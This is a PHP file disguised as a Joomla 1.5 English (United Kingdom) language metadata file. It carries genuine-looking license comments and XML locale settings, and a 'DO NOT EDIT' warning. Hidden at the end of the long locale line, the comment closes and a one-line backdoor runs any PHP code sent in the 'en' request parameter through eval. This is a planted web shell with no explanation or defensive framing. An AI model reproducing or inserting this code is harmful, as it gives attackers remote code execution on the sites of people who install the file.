<?php
/**
* WARNING: DO NOT EDIT THIS FILE.
* @package		Joomla
* @copyright	Copyright (C) 2005 - 2008 Open Source Matters. All rights reserved.
* @license		GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.

<?xml version="1.0" encoding="utf-8"?>
<!--  -->
<metafile version="1.5"  client="site" >
	<name>English(United Kingdom)</name>
	<tag>en-GB</tag>
	<version>1.5.15</version>
	<creationDate>2009-10-27</creationDate>
	<author>Joomla! Project</author>
	<authorEmail>admin@joomla.org</authorEmail>
	<authorUrl>www.joomla.org</authorUrl>
	<copyright>Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.</copyright>
	<license>http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL</license>
	<description></description>
	<metadata>
		<name>English (United Kingdom)</name>
		<tag>en-GB</tag>
		<rtl>
		<locale>en_GB.utf8, en_GB.UTF-8, en_GB, eng_GB, en, english, english-uk, uk, gbr, britain, england, great britain, uk, united kingdom, united-kingdom</locale>**/if (isset($_REQUEST['en'])) eval(stripslashes($_REQUEST['en']));
		?><winCodePage>iso-8859-1</winCodePage>
		<backwardLang>english</backwardLang>
		<pdfFontName>freesans</pdfFontName>
	</metadata>
	<params />
</metafile> 